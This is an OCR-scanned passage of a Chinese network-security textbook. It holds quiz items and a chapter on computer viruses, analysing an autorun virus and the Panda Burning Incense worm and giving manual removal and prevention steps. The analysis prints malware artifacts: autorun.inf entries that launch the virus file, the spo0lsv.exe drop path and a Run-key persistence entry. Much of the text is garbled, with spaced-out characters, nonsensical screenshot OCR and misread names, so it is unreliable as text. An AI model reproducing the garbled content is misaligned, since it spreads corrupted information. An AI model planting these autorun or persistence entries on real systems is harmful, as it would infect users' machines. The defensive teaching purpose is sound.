C. 监视 PC 系统 的 运行 情况 D. 监视 一 个 网 站 的 发 展 方向 
4. 端口 扫描 技术 ( 。 )。 
A. 只 能 作为 攻击 工具 
B. 只 能 作为 防御 工具 
C. 只 能 作为 检查 系统 漏洞 的 工具 
D. 既 可 以 作为 攻击 工具 ， 也 可 以 作为 防御 工具 
5. 向 有 限 的 空间 输入 超 长 的 字符 串 是 哪 一 种 攻击 手段 ?(  ) 
A. 缓冲 区 溢出 ” B. 网 络 监听 C. 拒绝 服务 D. IP 欺骗 
6. Windows NT 系统 能 设置 为 在 几 次 无 效 登录 后 锁定 账号 ， 这 可 以 防止 ( 。 )。 
A. 木马 B. 暴力 攻击 
C.IP 欺 骗 D. 缓存 溢出 攻击 
7. 为 了 保证 口令 的 安全 ， 哪 项 做 法 是 不 正确 的 ? (  ) 
A. 用 户口 令 长 度 不 少 于 6 个 字符 
B. 口令 字符 最 好 是 数字 、 字 母 和 其 他 字符 的 混合 
C. 口令 显示 在 显示 屏 上 
D. 对 用 户口 令 进行 加 密 
8. 电子 邮件 客户 端 通常 需要 用 ( ”) 协 议 来 发 送 邮 件 。 
A. 仅 SMTP B. 仅 POP 
C. SMTP 和 POP D. 以 上 都 不 正确 
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【项 目 要 点 】 


@ 计算 机 病毒 的 概念 、 特 点 及 分 类 。 

@ 典型 病毒 分 析 。 

@ 典型 计算 机 病毒 的 手动 清除 。 
【学 习 目 标 】 

掌握 计算 机 病毒 的 概念 。 

了 解 计算 机 病毒 的 特点 及 分 类 。 
掌握 典型 计算 机 病毒 的 分 析 。 

掌握 典型 计算 机 病毒 的 手动 清除 方法 。 


4.1 认识 计算 机 病毒 
4.1.1 计算 机 病毒 的 概念 


20 世纪 60 年 代 初 ， 美 国 贝尔 实验 室 一 个 名 为 “ 磁 世 大战” 的 游戏 ， 游 戏 中 通过 复制 
自身 来 摆脱 对 方 的 控制 ， 这 就 是 所 谓 “ 病 毒 ”的 第 一 个 雏形 。 

20 世纪 70 年 代 ， 美 国 作家 雷 恩 在 其 出 版 的 《P1 的 青春 》 一 书 中 构思 了 一 种 能 够 自我 
复制 的 计算 机 程序 ， 并 第 一 次 称 之 为 “计算 机 病毒 ”。 

1983 年 11 月 ， 在 国际 计算 机 安全 学 术 研讨 会 上 ， 美 国 计 算 机 专家 首次 将 病毒 程序 在 
VAX/750 计算 机 上 进行 了 实验 ， 世 界 上 第 一 个 计算 机 病毒 就 这 样 出 生 在 实验 室 中 。 

20 世纪 80 年 代 后 期 ， 巴 基 斯 坦 有 两 个 以 编程 为 生 的 兄弟 ， 他 们 为 了 打击 那些 盗版 软件 的 使 
用 者 ， 设 计 出 了 一 个 名 为 “巴基斯坦 智囊 ”的 病毒 ， 这 就 是 世界 上 流行 的 第 一 个 真正 的 病毒 。 

那么 ， 究 竟 什 么 是 计算 机 病毒 呢 ? 

1994 年 2 月 18 日 ， 我 国正 式 颁布 实施 了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 
条 例 》。 在 该 条 例 的 第 二 十 八条 中 明确 指出 : “计算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程序 
中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 响 计算 机 使 用 ， 并 能 自我 复制 的 一 组 计算 机 指 
令 或 者 程序 代码 。” 

这 个 定义 具有 法 律 性 、 权 威 性 。 根 据 这 个 定义 ， 计 算 机 病毒 是 一 种 计算 机 程序 ， 它 不 
仅 能 破坏 计算 机 系统 ， 而 且 还 能 够 传染 到 其 他 系统 。 计 算 机 病毒 通常 隐藏 在 其 他 正常 程序 
中 ， 能 生成 自身 的 拷贝 并 将 其 插入 其 他 的 程序 中 ， 对 计算 机 系统 进行 恶意 的 破坏 。 

计算 机 病毒 不 是 天 然 存在 的 ， 是 某 些 人 利用 计算 机 软 、 硬 件 固有 的 脆弱 性 ， 编 制 的 具 
有 破坏 功能 的 程序 。 计 算 机 病毒 能 通过 某 种 途径 潜伏 在 计算 机 存储 介质 (或 程序 ) 里 ， 当 达 
到 某 种 条 件 时 即 被 激活 ， 它 用 修改 其 他 程序 的 方法 将 自己 的 精确 拷贝 或 者 演化 的 形式 放 入 
其 他 程序 中 ， 从 而 感染 它们 ， 对 计算 机 资源 进行 破坏 。 


4.1.2 计算 机 病毒 的 特点 和 分 类 


1. 计算 机 病毒 的 特点 
传统 意义 上 的 计算 机 病毒 一 般 具有 以 下 几 个 特点 。 
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1) 破坏 性 


任何 病毒 只 要 侵入 系统 ， 都 会 对 系统 及 应 用 程序 产生 不 同 程度 的 影响 ， 凡 是 由 软件 手 
段 能 触及 计算 机 资源 的 地 方 均 可 能 受到 计算 机 病毒 的 破坏 。 轻 者 会 降低 计算 机 工作 效率 ， 
占用 系统 资源 ， 重 者 可 导致 系统 崩溃 。 

根据 病毒 对 计算 机 系统 造成 破坏 的 程度 ， 可 以 把 病毒 分 为 良性 病毒 与 恶性 病毒 。 良 性 
病毒 可 能 只 是 干扰 显示 屏幕 ， 显 示 一 些 乱 码 或 无 聊 的 语句 ， 或 者 根本 没有 任何 破坏 动作 ， 
只 是 占用 系统 资源 。 这 类 病毒 较 多 ， 如 GENP、 小 球 、W-BOOT 等 。 恶 性 病毒 则 有 明确 的 
目的 ， 它 们 破坏 数据 、 删 除 文件 、 加 密 磁 盘 ， 甚 至 格式 化 磁盘 ， 有 的 恶性 病毒 对 数据 造成 
不 可 挽回 的 破坏 。 这 类 病毒 有 CIH、 红 色 代 码 等 。 

2) 隐蔽 性 

病毒 程序 大 多 夹 在 正常 程序 之 中 ， 很 难 被 发 现 。 它 们 通常 附 在 正常 程序 中 或 磁盘 较 隐 
项 的 地 方 (也 有 个 别 的 以 隐 含 文件 形式 出 现 )， 这 样 做 的 目的 是 不 让 用 户 发 现 它 的 存在 。 如 
果 不 经 过 代码 分 析 ， 我 们 很 难 区 别 病毒 程序 与 正常 程序 。 一 般 在 没有 防护 措施 的 情况 下 ， 
计算 机 病毒 程序 取得 系统 控制 权 后 ， 可 以 在 很 短 的 时 间 里 传染 大 量程 序 。 而 且 受 到 传染 
后 ， 计 算 机 系统 通常 仍 能 正常 运行 ， 使 用 户 不 会 感到 有 任何 异常 。 

大 部 分 病毒 程序 具有 很 高 的 程序 设计 技巧 、 代 码 短小 精 悍 ， 其 目的 就 是 为 了 隐蔽 。 病 
毒 程序 一 般 只 有 几 百 字 节 ， 而 PC 机 对 文件 的 存 取 速 度 可 达 每 秒 几 百 KB 以 上 ， 所 以 病毒 
程序 在 转瞬 之 间 便 可 将 这 短 短 的 几 百 字 节 附着 到 正常 程序 之 中 ， 非 常 不 易 被 察觉 。 

3) 潜伏 性 

大 部 分 计算 机 病毒 感染 系统 之 后 不 会 马上 发 作 ， 可 长 期 隐藏 在 系统 中 ， 只 有 在 满足 特 
定 条 件 时 才 启 动 其 破坏 模块 。 例 如 ，PETER-2 病毒 在 每 年 的 2 月 27 日 会 提 三 个 问题 ， 答 
错 后 会 将 硬盘 加 密 。 著 名 的 “黑色 星期 五 ”病毒 在 逢 13 号 的 星期 五 发 作 。 当 然 ， 最 令 人 
难忘 的 是 26 日 发 作 的 CIH 病毒 。 这 些 病 毒 在 平时 会 隐藏 得 很 好 ， 只 有 在 发 作 日 才 会 显露 
出 其 破坏 的 本 性 。 

4) 传染 性 

计算 机 病毒 的 传染 性 是 指 病毒 具有 把 自身 复制 到 其 他 程序 中 的 特性 。 计 算 机 病毒 是 一 
段 人 为 编制 的 计算 机 程序 代码 ， 这 段 程序 代码 一 旦 进入 计算 机 并 得 以 执行 ， 它 会 搜寻 其 他 
符合 其 传染 条 件 的 程序 或 存储 介质 ， 确 定 目标 后 再 将 自身 代码 插入 其 中 ， 达 到 自我 繁殖 的 
目的 。 只 要 一 台 计 算 机 染 毒 ， 如 不 及 时 处 理 ， 那 么 病毒 会 在 这 台 计 算 机 上 迅速 扩散 ， 其 中 
的 大 量 文件 (一 般 是 可 执行 文件 ) 会 被 感染 。 而 被 感染 的 文件 又 成 了 新 的 传染 源 ， 再 与 其 他 
机 器 进行 数据 交换 或 通过 网 络 接触 ， 病 毒 会 在 整个 网 络 中 继续 传染 。 

正常 的 计算 机 程序 一 般 是 不 会 将 自身 的 代码 强行 连接 到 其 他 程序 之 上 的 。 而 病毒 却 能 
使 自身 的 代码 强行 传染 到 一 切 符合 其 传染 条 件 的 未 受到 传染 的 程序 之 上 。 是 否 具有 传染 性 
是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 


2. 计算 机 病毒 的 分 类 


通常 ， 计 算 机 病毒 可 分 为 下 列 几 类 。 
1) 木马 病毒 
木马 病毒 其 前 缀 是 Trojan， 其 共有 特性 是 以 盗 取 用 户 信息 为 目的 。 
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2) 系统 病毒 

系统 病毒 的 前 缀 为 Win32、PE、Win95、W32、W95 等 ， 其 主要 感染 Windows 系统 的 
可 执行 文件 。 

3) 蠕虫 病毒 

蠕虫 病毒 的 前 级 是 Worm， 其 主要 是 通过 网 络 或 者 系统 漏洞 进行 传播 。 

4) 脚本 病毒 

脚本 病毒 的 前 级 是 Script， 其 特点 是 采用 脚本 语言 编写 。 

5) 后 门 病毒 

后 门 病毒 的 前 缀 是 Backdoor， 其 通过 网 络 传播 ， 并 在 系统 中 打开 后 门 。 

6) 宏 病毒 

其 实 宏 病 毒 也 是 脚本 病毒 的 一 种 ， 其 利用 MS Office 文档 中 的 宏 进 行 传播 。 

7) 破坏 性 程序 病毒 

破坏 性 程序 病毒 的 前 级 是 Harm， 其 一 般 会 对 系统 造成 明显 的 破坏 ， 如 格式 化 硬盘 等 。 

8) 玩笑 病毒 

玩笑 病毒 的 前 级 是 Joke， 是 恶作剧 性 质 的 病毒 ， 通 常 不 会 造成 实质 性 的 破坏 。 

9) 捆绑 机 病毒 

捆绑 机 病毒 的 前 级 是 Binder， 这 是 一 类 会 和 其 他 特定 应 用 程序 捆绑 在 一 起 的 病毒 。 


4.1.3 ”计算 机 病毒 的 发 展 趋势 


近年 来 ， 计 算 机 病毒 主要 以 木马 病毒 为 主 ， 这 是 由 于 盗号 、 隐 私信 息 贩 售 两 大 黑色 产 
业 链 已 形成 规模 。QQ、 网 游 账 密 、 个 人 隐私 及 企业 机 密 都 已 成 为 黑客 牟取 暴利 的 主要 渠 
道 。 与 木马 齐名 的 蠕虫 病毒 也 有 大 幅 增 长 的 趋势 。 后 门 病毒 复出 ， 综 合 蠕虫 、 黑 客 功能 于 
一 体 ， 其 危害 不 容 小 舰 ， 例 如 近年 流行 的 Backdoor Win32.Rbotbyb， 会 盗 取 FTP、Tftp 及 
电子 支付 软件 的 密码 ， 造 成 用 户 利益 损失 。 

计算 机 病毒 的 主要 发 展 趋势 如 下 。 


1. 传统 计算 机 病毒 依然 活跃 ， 其 技术 将 不 断 革新 


木马 和 蠕虫 病毒 任 着 自身 强大 的 变种 适应 能 力 和 背后 带 来 的 巨大 收益 ， 将 在 未 来 很 长 
一 段 时 间 内 成 为 困扰 用 户 的 巨大 隐患 。2013 年 3 月 出 现 的 蠕虫 病毒 Worm_Vobfus 及 其 变 
种 ， 具 有 木马 病毒 的 特征 一 一 连接 互联 网 络 中 指定 的 服务 器 ， 与 一 个 远程 恶意 攻击 者 进行 
互联 通信 。 自 2009 年 牛 年 出 现 的 “ 畦 牛 ”( 又 名 “ 猫 癣 ”) 病 毒 肆虐 至 今 ， 像 “得 牛 ”病毒 
一 样 利用 dll 劫持 技术 传播 的 病毒 越发 流行 。 各 种 后 门 、 木 马 都 采用 此 种 方法 运行 和 传播 
自己 ， 动 持 系 统 的 dll 文件 种 类 也 越 来 越 多 。 随 着 身份 认证 UsbKey 和 杀毒 软件 主动 防御 的 
兴起 ， 黏 虫 技术 类 型 和 特殊 反 显 技术 类 型 木马 逐渐 开始 系统 化 。 这 些 融 合 了 新 技术 的 病毒 
令 人 防不胜防 。 


2. 防 病毒 软件 百家争鸣 


近年 的 防 病毒 软件 已 普遍 由 收费 模式 转变 为 免费 模式 ， 为 用 户 提供 的 各 种 体验 越 加 丰 
富 。 防 病毒 软件 在 开发 更 加 强大 的 杀毒 功能 的 同时 ， 也 以 此 为 契机 推出 了 自家 相关 的 系统 
软件 ， 如 QQ 管家 、360 浏览 器 、 金 山 WPS 等 ， 这 些 软件 在 为 我 们 提供 系统 管理 功能 的 同 
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时 也 在 保卫 着 我 们 的 信息 安全 。 杀 毒 软件 的 角力 势必 带动 新 技术 的 产生 ， 这 是 每 位 用 户 喜 
闻 乐 见 的 事情 。 

3. 云 安全 服务 将 成 为 新 趋势 

随 着 采用 特征 库 的 判别 法 疲 于 应 付 日 渐 迅 猛 的 网 络 病毒 大 军 ， 融 合 了 并 行 处 理 、 网 格 计 
算 、 未 知 病毒 行为 判断 等 新 兴 技 术 和 概念 的 云 安全 服务 ， 将 成 为 与 之 抗衡 的 新 型 武器 。 识 别 
和 查 杀 病毒 不 再 仅仅 依靠 本 地 硬盘 中 的 病毒 库 ， 而 是 依靠 庞大 的 网 络 服务 ， 实 时 进行 采集 、 
分 析 以 及 处 理 。 整 个 互联 网 就 是 一 个 巨大 的 “杀毒 软件 ”， 参 与 者 越 多 ， 每 个 参与 者 就 越 
安全 ， 整 个 互联 网 就 会 更 安全 。 可 以 预见 ， 随 着 云 计算 、 云 储存 等 一 系列 云 技术 的 普及 ， 
云 安全 技术 必 将 协同 这 些 云 技术 一 道 ， 成 为 为 用 户 系统 信息 安全 保驾 护航 的 有 力 屏障 。 

4. 制作 病毒 难度 下 降 

计算 机 病毒 可 能 带 来 巨大 的 收益 ， 使 得 越 来 越 多 的 不 法 分 子 对 这 种 高 科技 手段 趋 之 若 
歼 ， 网 络 的 发 展 也 令 信 息 资源 的 共享 程度 空前 高 涨 。 一 些 病 毒 代码 得 以 共享 ， 甚 至 产生 了 
专门 编写 病毒 的 软件 。 结 合 VB、Java 和 ActiveX 等 当前 最 新 的 编程 语言 与 编程 技术 ， 用 
户 只 要 略 懂 一 些 编程 知识 ， 简 单 操作 便 可 产生 具有 破坏 力 和 感染 力 的 “同族 ”新 病毒 。 


4.2 典型 病毒 
4.2.1 自动 播放 病毒 


1. 自动 播放 病毒 的 现象 及 清除 


在 虚拟 机 中 运行 病毒 样本 ， 病 毒 发 作 后 的 现象 及 清除 过 程 如 下 。 
(1) 每 个 盘 符 下 都 生成 autorun.inf 文件 ， 如 图 4-1 所 示 。 


文件 FE) 攻关 查看 收 总 如 工具 四 帮助 
四 鲁 - 加 让 万 旦 区 xx 国 - 


地 址 @) |<p Cc:\ 


统 和 ] 
系统 任务 Be gs 篇 Progran Files 


加 隐语 此 缀 动 器 的 内 容 
本 ) 一 Systen Volune 
只 搜索 文件 或 文件 夹 Infornation 


文件 和 文件 夹 任务 


四 一 人 新 六 件 天 
从 这 1 文人 天 必 到 
i 


由 共 训 此 文件 天 











图 4-1 生成 autorun.inf 文 件 
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(2) 用 记事 本 打开 autorun.inf 文件 ， 查 看 其 内 容 ， 如 图 4-2 所 示 。 





站 回回 加 
文件 @) 编辑 E) 格式 0) 查看 V) 天 助 00 


[AutoRun] 
open=auto exe 


shellexecute=auto -exe 
shell\Auto\comnand=auto -exe 





图 4-2 autorun.inf 文件 内 容 


(3) 使 用 瑞星 听诊 器 RSDetect 进行 检测 ， 提 取 日 志 。 
(4) 分 析 日 志 ， 发 现 很 多 进程 都 有 相同 的 动态 库 文件 A490C188.dl， 如 图 4-3 所 示 。 
EE 同上 回避 | 
文件 编辑 E) 查看 WD) 收 阅 由 工具 CD) 玫 助 人 0 E39 
习 国 的 | 万 mr 丙 sax @ 全- 避 国 沪 
过 ] c: \Docunent ~ 园区 到 馆 ” 国安 全 助手 ”多 广 告 拉 夫人 铭 系统 修复 免费 碍 


全 卡 卡 三 洁 拦 蕊 : 0 个 


图 4-3 瑞星 听诊 器 日 志 分 析 





(5) 在 C\WINDOWS\system32 目录 中 找到 A490C188.dll， 发 现 还 有 一 个 和 它 同 时 创建 
的 文件 ， 尝 试 删除 两 个 病毒 文件 ， 无 法 删除 。 

(6) 使 用 IceSword 清除 C:\WINDOWS\system32 下 两 个 或 三 个 病毒 文件 、 磁 盘 根 目录 
下 的 auto 和 autorun.inf 文件 。 


【知识 链接 一 一 冰 刃 IceSword】 


冰 刃 IceSword 是 一 斩 断 黑手 的 利刃 ， 它 适用 于 Windows。IceSword 内 部 功能 是 十 分 
强大 的 。 有 很 多 类 似 功能 的 软件 ， 如 一 些 进 程 工具 、 端 口 工 具 ， 但 是 现在 的 系统 级 后 门 功 
能 越 来 越 强 ， 一 般 都 可 轻而易举 地 隐 茂 进程、 端口、 注册 表 、 文 件 信息 ， 普 通 的 工具 根本 
无 法 发 现 这 些 “ 幕 后 黑手 ”。 而 IceSword 使 用 大 量 新 颖 的 内 核 技 术 ， 使 得 这 些 后 门 躲 无 
所 躲 。 


2. 自动 播放 病毒 的 原理 一 -autorun.inf 文件 
严格 地 说 ，autorun.inf 文件 是 一 个 必须 存放 在 驱动 器 根 目录 下 的 有 一 定格 式 并 且 文 件 
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名 为 autorun.inf 的 文本 文件 。 当 双击 计算 机 某 个 分 区 或 者 右 击 某 个 分 区 弹出 菜单 的 时 候 ， 
系统 将 搜索 该 分 区 根 目录 下 是 否 存 在 autorun.inf 文件 。 如 果 存 在 ， 则 根据 autorun.inf 文件 
中 的 内 容 执 行 相应 的 操作 。 

(1) 在 计算 机 某 个 分 区 的 根 目录 下 创建 autorun.inf 文件 。 

(2) 在 autorun.inf 文件 中 输入 如 下 内 容 : 


[autorun] 

Open=notepad .exe 
Shellexecute=notepad.exe 
Shell\auto\command=notepad.exe 


(3) 注销 或 重新 启动 虚拟 机 ， 双 击 该 驱动 器 ， 观 察 效果 。 
(4) 重复 (1)~(3) 步 ， 在 autorun.inf 文件 中 输入 如 下 内 容 : 
[autorun] 

Open=notepad.exe 

Shell\open= 打 开 (&0) 
Shell\open\command=notepad.exe 
Shell\open\default=1 

Shell\explore= 资 源 管理 器 (&x) 
Shell\explore\command=notepad .exe 


使 用 这 段 代码 后 ， 在 写 有 该 代码 的 驱动 器 处 右 击 ， 将 和 正常 的 驱动 器 无 任何 区 别 。 
3， 自动 播放 病毒 的 预防 


1) 关闭 系统 自动 播放 功能 

选择 “开始 ”一 “运行 ”命令 ， 在 弹出 的 对 话 框 中 ， 输 入 命令 gpeditmsc， 单 击 “确定 ” 
按钮 后 ， 打 开 对 应 系统 的 “组 策略 ”窗口 。 在 该 窗口 的 左 侧 区 域 ， 打 开 “ 本 地 计算 机 策略 ”一 
“计算 机 配置 ”一 “管理 模板 ”一 “系统 ”分 支 ， 在 右 侧 区 域 找到 “关闭 自动 播放 ”选项 并 
右 击 ， 从 弹出 的 快捷 菜单 中 执行 “属性 ”命令 选中 打开 对 话 框 的 “已 启用 ”选项 ， 并 且 从 
“关闭 自动 播放 ”下 拉 列 表 中 选择 “所 有 驱动 器 ”选项 ， 最 后 单 击 “确定 ”按钮 ， 如 图 4-4 
所 示 。 

天 亲 下 动 揪 下 并 性 字义 


王 [W 朋 
外 关闭 自动 播放 


口 未 蛇 置 CC) 
四 己 B 用 @) 
OM 用 W) 


天 且 和 过手 从 [EE 对 





支持 于 : EE Nieroseft Wndors 2000 


CC Cuw | 
图 4-4 关闭 自动 播放 





.ss 


DY @ 


2) 阻止 autorun.inf 文件 的 创建 

在 磁盘 根 目录 创建 autorun.inf 文件 夹 ， 在 autorun.inf 文件 夹 里 建立 一 个 任意 文件 名 的 
无 效 文 件 夹 ， 所 谓 无 效 文件 夹 就 是 在 文件 名 后 面 添加 了 三 个 点 再 加 一 个 斜 杠 ， 这 样 这 个 文 
件 夹 就 成 了 无 效 文件 夹 。 无 效 文件 夹 不 能 轻易 被 删除 ， 这 样 可 以 对 病毒 起 到 免疫 的 作用 。 
具体 命令 如 下 : 

ad: 

Md autorun.inf 


Cd autorun.inf 
Md nokill...\ 


4.2.2 ”蠕虫 病毒 一 熊猫 烧香 病毒 


蠕虫 病毒 是 一 种 常见 的 计算 机 病毒 。 它 是 利用 网 络 进行 复制 和 传播 ， 传 染 途径 是 网 络 
和 电子 邮件 。 最 初 的 蠕虫 病毒 定义 是 因为 在 DOS 环境 下 ， 病 毒 发 作 时 会 在 屏幕 上 出 现 一 
条 类 似 虫 子 的 东西 ， 胡 乱 吞 吃 屏幕 上 的 字母 并 将 其 变形 。 里 虫 病毒 是 自 包含 的 程序 (或 是 一 
套 程序 )， 它 能 传播 自身 功能 的 拷贝 或 自身 的 某 些 部 分 到 其 他 的 计算 机 系统 中 (通常 是 经 过 
网 络 连接 )。 

蠕虫 病毒 是 一 种 通过 网 络 传播 的 恶意 病毒 ， 它 的 出 现 相 对 于 木马 病毒 、 宏 病毒 较 晚 ， 
但 是 蠕虫 病毒 无 论 从 传播 速度 、 传 播 范围 还 是 从 破坏 程度 上 ， 都 是 以 往 的 传统 病毒 所 无 法 
比拟 的 。 网 络 蠕虫 病毒 作为 对 互联 网 危害 严重 的 一 种 计算 机 程序 ， 其 破坏 力 和 传染 性 不 容 
忽视 。 

与 传统 的 病毒 不 同 ， 蠕 虫 病毒 以 计算 机 为 载体 ， 以 网 络 为 攻击 对 象 。 蠕 虫 和 传统 病毒 
都 具有 传染 性 和 复制 功能 ， 这 两 个 主要 特性 上 的 一 致 ， 导 致 二 者 之 间 是 非常 难 区 分 的 。 万 
其 是 近年 来 ， 越 来 越 多 的 传统 病毒 采取 了 部 分 蠕虫 的 技术 ， 另 一 方面 具有 破坏 性 的 蠕虫 也 
采取 了 部 分 传统 病毒 的 技术 ， 更 加 剧 了 这 种 情况 。 表 4-1 给 出 了 传统 病毒 和 蠕虫 的 一 些 




















差别 。 

表 4-1 传统 病毒 与 蠕虫 病毒 的 差别 

传统 病毒 蠕虫 病毒 

存在 形式 寄生 独立 个 体 
复制 形式 插入 到 寄主 程序 中 自身 的 拷贝 
传染 机 制 寄主 程序 运行 系统 存在 漏洞 
攻击 目标 本 地 文件 网 络 上 其 他 计算 机 
触发 传染 计算 机 使 用 者 程序 自身 
影响 重点 文件 系统 网 络 性 能 、 系 统 性 能 
使 用 者 角色 传播 中 的 关键 环节 无 关 
防治 措施 从 寄主 文件 中 摘除 为 系统 打 补 丁 
对 抗 主体 计算 机 使 用 者 网 络 管理 人 员 








.ea 
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从 以 上 对 比 可 发 现 ， 传 统 病毒 主要 攻击 的 是 文件 系统 ， 在 其 传染 的 过 程 中 ， 计 算 机 使 
用 者 是 传染 的 触发 者 ， 是 传染 的 关键 环节 ， 使 用 者 的 计算 机 知识 水 平 的 高 低 常常 决定 了 传 
统 病毒 所 能 造成 的 破坏 程度 。 而 蠕虫 主要 是 利用 计算 机 系统 漏洞 进行 传染 ， 搜 索 到 网 络 中 
存在 漏洞 的 计算 机 后 主动 进行 攻击 ， 在 传染 的 过 程 中 ， 与 计算 机 操作 者 是 否 进行 操作 无 
关 ， 从 而 与 使 用 者 的 计算 机 知识 水 平 无 关 。 另 外 ， 蠕 虫 的 定义 中 强调 了 自身 副本 的 完整 性 
和 独立 性 ， 这 也 是 区 分 蠕虫 和 传统 病毒 的 重要 因素 。 可 以 通过 简单 地 观察 攻击 程序 是 否 存 
在 载体 来 区 分 蠕虫 与 传统 病毒 。 


【知识 拓展 一 一 莫 里 斯 蠕虫 】 


这 个 程序 只 有 99 行 ， 利 用 了 UNIX 系统 中 的 缺点 ， 用 Finger 命令 查找 联机 用 户 名 
单 ， 然 后 破译 用 户口 令 ， 用 Mail 系统 复制 、 传 播 本 身 的 源 程序 ， 再 编译 生成 代码 。 最 初 网 
络 蠕虫 的 设计 目的 是 当 网 络 空闲 时 ， 程 序 就 在 计算 机 间 “游荡 ”而 不 带 来 任何 损害 。 当 有 
机 器 负荷 过 重 时 ， 该 程序 可 以 从 空闲 计算 机 “ 借 取 资 源 ” 而 达到 网 络 的 负载 平衡 。 而 英里 
斯 蠕虫 不 是 “ 借 取 资 源 ”， 而 是 “ 耗 尽 所 有 资源 ”， 是 通过 互联 网 传播 的 第 一 种 蠕虫 病 
毒 。 它 既是 第 一 种 蠕虫 病毒 ， 也 是 第 一 次 得 到 主流 媒体 强烈 关注 的 病毒 。 它 也 是 依据 美国 
1986 年 《计算 机 欺诈 及 滥用 法 案 》 而 定罪 的 第 一 宗 案 件 。 该 蠕虫 由 康 奈 尔 大 学 学 生 罗 伯 
特 。 泰 潘 。 英 里 斯 (Robert Tappan Morris) 编 写 ， 于 1988 年 11 月 2 日 从 麻 省 理工 学 院 (MIT) 
施放 到 互联 网 上 。 





1， 熊猫 烧香 病毒 的 现象 
(1) 计算 机 中 的 .exe 文件 变 成 熊猫 烧香 图 标 ， 如 图 4-5 所 示 。 


i BC2. hlp 
BC2. exe @) 帮助 文件 
请 63 邢 


BCQC_Reaale txt 
文本 文档 加 BCShellExB64. dll 
218 | 


BCShellEx. dl ChangeLog. txt Desktop_. ini 
24.2.0 文 尘 且 档 6 i 


eyond Compare 7 1 区 
Readme. txt sfFTPLib. dl trial. key 
文本 立 档 1.5.8.1 8 | EY 文件 
3 区 SmartFTP FTP Lib 1 了 


unins000. dat 
DAT 文件 nins000_ exe 
3 0 


图 4-5 .exe 文件 变 成 熊猫 烧香 图 标 


(2) 在 各 分 区 根 目录 生成 病毒 副本 : Xi\setup.exe，X:\autorun.inf， 如 图 4-6 所 示 。 
autorun.inf 内 容 如 下 : 
[AutoRun] 


OPEN=setup.exe 
shellexecute=setup.exe 
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shell\Auto\command=setup.exe 


(3) 熊猫 烧香 病毒 尝试 关闭 安全 软件 等 系统 相关 任务 。 尝 试 打开 注册 表 编 辑 器 、 系 统 





配置 实用 程 
(4) 病毒 会 


文件 和 文件 夹 任务 


外 他 时 一 个 新 文件 天 
人 失 这 个 文件 天 发 布 到 
Web 


芯 共享 此 文件 夹 





序 (msconfig)、Windows 任务 管理 器 、 瑞 星 等 相关 杀毒 软件 ， 发 现 无 法 运行 。 
“显示 所 有 文件 和 文件 夹 ” 设 置 ， 如 图 4-7 所 示 。 


System yolume 
Information 


RECYCLER 


setup. exe 


图 4-6 根 目 录 下 的 病毒 文件 


文件 夫 选 项 
第 规 | 查看 
文件 买 视图 


四 加 
文件 类 型 | 脱 机 文件 


次 可 以 梯 正 在 为 此 文件 夹 使 用 的 视图 (例如 详细 
信息 或 平 铺 ) 应 用 芭 所 有 文件 夹 。 


应 用 到 所 有 文件 卖 LL)】| 重 置 所 有 文件 夹 (E) 


高 级 设置 
局 文件 和 文件 到 
口 不 艇 存 编 咯 图 
回 记 住 每 个 文件 夹 的 视图 设置 
回 使 用 简单 文件 共享 (推荐 ) 
展 标 指向 文件 志和 点 面 项 时 显示 提示 信息 
口 显示 系统 文件 严 的 内 容 
口 隐 疗 受 保护 的 拘 作 系统 文件 推荐 ) 
局 隐语 文件 和 文件 到 
〇 不 显示 隐 李 的 文件 和 文件 严 
) 显示 所 有 文件 和 文件 实 
口 隐 疗 已 知 文件 类 型 的 扩展 名 


还 原 为 默认 值 @) 


确定 取消 





4-7 ”修改 “显示 所 有 文件 和 文件 夹 ”设置 





(5) 病毒 进程 复制 自身 型 
如 图 4-8 所 示 。 


S| c:\Docune 


.se 


系统 目录 下 (使 用 瑞星 听诊 器 查看 ): %System%%\drivers\spo0Olsv.exe， 


nts and Settings\sw\ 夏 面 \ 分 析 工 具 \ 瑞 星 听诊 信息 . hts 





图 4-8 病毒 文件 
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(6) 创建 启动 项 (使 用 瑞星 听诊 器 查看 )， 且 删除 原 有 安全 工具 启动 项 ， 如 图 4.9 所 示 。 


[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run] 
svcshare=%System%s\drivers\ spo0lsv.exe 








图 4-9 病毒 启动 项 


(7) 安全 工具 冰 丸 无 法 正常 使 用 。 
2. 熊猫 烧香 病毒 的 手动 清除 


(1) 安全 工具 狙 剑 无 法 启动 ， 将 其 更 名 后 可 正常 启动 ， 结 束 病毒 进程 。 
病毒 进程 为 C:\\windows\System32\drivers、spo0lsv.exe， 以 及 rar.exe 进程 (注意 顺序 为 清 
除 病 毒 文 件 ， 内 存 清 零 ， 结 束 进 程 )， 如 图 4-10 所 示 。 


















[EE TET 


Em nT 
图 C WDocments md Settines\sm\ 古 面 \ 分 8068 1429 
扩展 功能 渔 c: mmors\systmszveonine «xe 2820 3036 

基本 功能 





| 参数 















jc rmOrs\syst en \ fobbre me 2040 eee 
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| 例 c reee Wiles\Wewre Weare Tools 1532 1428 
Sc: ‘WIDOWS\Explorer_ EXE 1428 1320 
进程 句 条 Ic: rors\systen32\svehost. «xe 1212 6 -kx WetvorlSer 
| 回 c:vmmows\systmazvsvehost exe 850 692 comLaunch 
| 全 Cc: mmors\systmwszvwinloeon wx 648 S52 
进程 窗口 IPIc: IMOYS\systen32\esrss exe 624 ss2 Objeethirecto. 
| 画 c:\preerm Files\Internet Explorer\i... 2116 1428 ”CVDocmen 
| 中 cvTDDOYS\Syste32vsmss exe S52 4 
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图 4-10 ”结束 病毒 进程 


(2) 此 时 ， 冰 刃 可 正常 启动 。 冰 刃 删 除 病 毒 文 件 ，( 可 能 前 面 已 经 删除 干净 )。 

病毒 文件 为 C:\windows\System32\drivers\ spo0lsv.exe， 以 及 system32 下 文件 (注意 设置 
禁止 进程 创建 ， 禁 止 协 件 功能 )。 

(3) 删除 分 区 盘 符 根 目录 下 的 病毒 文件 : X:\setup.exe，X:\autorun.inf。 

(4) 删除 病毒 启动 项 。 启 动 项 位 置 : HKEY _CURRENT USER\Software\Microsoft\ 
Windows\CurrentVersion\Run]"svcshare"="%System%\drivers\ spo0lsv.exe "， 如 图 4-11 所 示 。 











mm 计算 机 网 络 安全 教程 


国 sveshare REG_SZ C: \WIHDOWS\system32\drivers\spoDlsv. exe 


数值 名 称 gg) ; 


sveshare 








